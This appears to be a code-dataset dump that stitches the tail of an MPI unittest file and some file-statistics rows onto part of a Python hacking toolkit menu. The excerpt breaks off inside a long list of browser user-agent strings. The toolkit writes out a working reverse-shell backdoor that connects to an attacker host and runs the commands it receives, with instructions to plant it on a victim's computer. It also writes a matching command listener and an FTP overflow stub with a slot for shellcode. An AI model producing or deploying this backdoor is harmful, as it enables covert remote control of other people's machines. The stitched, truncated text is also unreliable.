if name == 'Open MPI':
if version < (2,1,0):
TestIOWorld = None
if version < (1,8,0):
TestIOWorld = None
if sys.platform.startswith('win'):
TestIOSelf = None
TestIOWorld = None
if name == 'MPICH2':
TestIOWorld = None
if name == 'Microsoft MPI':
TestIOWorld = None
if name == 'MPICH1':
TestIOSelf = None
TestIOWorld = None
if name == 'LAM/MPI':
TestIOSelf = None
TestIOWorld = None
try:
dummy = BaseTestIO()
dummy.COMM = MPI.COMM_SELF
dummy.setUp()
dummy.tearDown()
del dummy
except NotImplementedError:
TestIOSelf = None
TestIOWorld = None
if __name__ == '__main__':
unittest.main()
| 35.87822 | 76 | 0.487598 | 1,720 | 15,320 | 4.222093 | 0.072093 | 0.03415 | 0.024787 | 0.029744 | 0.833792 | 0.823327 | 0.783393 | 0.778436 | 0.771275 | 0.769623 | 0 | 0.024401 | 0.408812 | 15,320 | 426 | 77 | 35.962441 | 0.77741 | 0.002676 | 0 | 0.760705 | 0 | 0 | 0.003994 | 0 | 0 | 0 | 0 | 0 | 0.075567 | 1 | 0.040302 | false | 0 | 0.012594 | 0 | 0.075567 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
96425ffa7024eeed6b014af54776a01f9608fadb | 100,231 | py | Python | Tools/Trity-1/trity/crafttable.py | Anaswae/ITWSV | a8c3944aa0b44b6c4b520afef15f4a1a2ebe98ce | [
"MIT"
] | 39 | 2019-10-25T07:05:36.000Z | 2022-03-31T23:26:51.000Z | Tools/Trity-1/trity/crafttable.py | Anaswae/ITWSV | a8c3944aa0b44b6c4b520afef15f4a1a2ebe98ce | [
"MIT"
] | 1 | 2021-05-27T16:39:21.000Z | 2021-05-27T16:39:21.000Z | Tools/Trity-1/trity/crafttable.py | Anaswae/ITWSV | a8c3944aa0b44b6c4b520afef15f4a1a2ebe98ce | [
"MIT"
] | 17 | 2019-10-26T08:03:20.000Z | 2022-02-04T04:11:14.000Z | import os, io, platform, sys
from time import sleep
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def table():
table = raw_input(''+G+'' + color.UNDERLINE + 'Tri>Craft>' + color.END)
if table == "backdoor":
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating backdoor...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'For all your remote access needs!' + color.END)
FILE = open("backdoor.py","w")
#============================================================================#
#=================================BACKDOOR===================================#
#============================================================================#
FILE.write("""
#!/usr/bin/python
import subprocess #Process commands
import socket #Process socket data
import os
import sys
import time
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
#To test this on one computer open 2 terminals and make sure your root.
#In terminal 1 type "nc -lvp 443" without the quotes
#Or use the listener
#In the other terminal open the this python script and there you go!
#[!]You have get this python script onto the victims computer[!]#
#--------------THE REAL CODE---------------#
host = "127.0.0.1" #Attack computers ip <-- Change to whatever your ip is (internal)
port = 443 #Attack port
passwd = "root" #Password so other people cant connect
#Check password
def Login():
global s
s.send(""+T+"Login:"+W+"")
pwd = s.recv(1024)
if pwd.strip() != passwd:
Login()
else:
s.send(""+G+"Connected #>"+W+"")
Shell()
#Execute shell commands
def Shell():
while True:
data = s.recv(1024)
if data.strip() == ":kill":
break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
s.send(output)
s.send(""+G+"#>"+W+"")
#Start Script
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print ""
Login()
except:
print ""
""")
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END)
FILE.close()
elif table == "help":
print (''+C+'backdoor'+W+' - generate a backdoor that you can plant on other machines' + color.END)
print (''+C+'listener'+W+' - listen to a specific port for the backdoor and other things' + color.END)
print (''+C+'exploit'+W+' - exploit a vulnerable target with shell code' + color.END)
print (''+C+'useragents'+W+' - generate user-agents' + color.END)
elif table == "listener":
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating listener...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Use this for your backdoor to get the connection!' + color.END)
FILE = open("listener.py","w")
#============================================================================#
#=================================LISTENER===================================#
#============================================================================#
FILE.write("""
#!/usr/bin/python
from socket import *
HOST = '' # '' means bind to all interfaces
PORT = 443 # port you can change this to anything but its gotta be the same as the backdoor
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((HOST, PORT))
print "Listening on 0.0.0.0:%s" % str(PORT)
s.listen(10)
conn, addr = s.accept()
print 'Connected by', addr
data = conn.recv(1024)
while 1:
command = raw_input("Enter shell command or quit: ")
conn.send(command)
if command == "quit": break
data = conn.recv(1024)
print data
conn.close()
""")
FILE.close()
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END)
elif table == "exploit":
#============================================================================#
#=================================EXPLOIT====================================#
#============================================================================#
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating exploit thingy...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Use this to exploit vulnerable machines! Change the shell code to whatever you want!' + color.END)
FILE = open("exploit.py","w")
FILE.write("""import sys
import socket
import os
hostname = "idk"
password = "whatever"
username = "A"*1024 #<-- shellcode here
connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect.connect((hostname, 21))
except:
print "Failed LOL"
response = connect.recv(2000)
print response
sys.exit(1)
""")
FILE.close()
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END)
elif table == "useragents":
#============================================================================#
#===============================USER-AGENTS==================================#
#============================================================================#
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating User Agents...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Use this for many different things!' + color.END)
FILE = open("User-Agents.txt","w")
FILE.write("""Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 7.1; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; AskTB5.5)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; FDM; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; Tablet PC 2.0)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; msn OptimizedIE8;ZHCN)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre
Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110323 Firefox/4.2a1pre
Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre
Mozilla/5.0 (Windows NT 5.1; rv:2.0b9pre) Gecko/20110105 Firefox/4.0b9pre
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8
Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre
Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre
Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4
Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre
Mozilla/5.0 (Windows NT 5.2; rv:2.0b13pre) Gecko/20110304 Firefox/4.0b13pre
Mozilla/5.0 (Windows NT 5.1; rv:2.0b13pre) Gecko/20110223 Firefox/4.0b13pre
Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre
Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20100101 Firefox/4.0b12pre
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110131 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110129 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b10pre) Gecko/20110118 Firefox/4.0b10pre
Mozilla/5.0 (Windows NT 6.1; rv:2.0b10pre) Gecko/20110113 Firefox/4.0b10pre
Mozilla/5.0 (X11; Linux i686; rv:2.0b10) Gecko/20100101 Firefox/4.0b10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:2.0b10) Gecko/20110126 Firefox/4.0b10
Mozilla/5.0 (Windows NT 6.1; rv:2.0b10) Gecko/20110126 Firefox/4.0b10
Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:2.0) Gecko/20110307 Firefox/4.0
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:2.0) Gecko/20110404 Fedora/16-dev Firefox/4.0
Mozilla/5.0 (X11; Arch Linux i686; rv:2.0) Gecko/20110321 Firefox/4.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20110319 Firefox/4.0
Mozilla/5.0 (Windows NT 6.1; rv:1.9) Gecko/20100101 Firefox/4.0
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.3a5pre) Gecko/20100526 Firefox/3.7a5pre
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b1) Gecko/20091014 Firefox/3.6b1 GTB5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090405 Firefox/3.6a1pre
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.2a1pre) Gecko/20090405 Ubuntu/9.04 (jaunty) Firefox/3.6a1pre
Mozilla/5.0 (Windows; Windows NT 5.1; es-ES; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre
Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9
Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 SUSE/3.6.8-0.1.1 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.2.8) Gecko/20100722 Ubuntu/10.04 (lucid) Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100727 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8
Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.8) Gecko/20100722 AskTbADAP/3.9.1.14019 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7
Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.4) Gecko/20100614 Ubuntu/10.04 (lucid) Firefox/3.6.4
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100625 Gentoo Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)
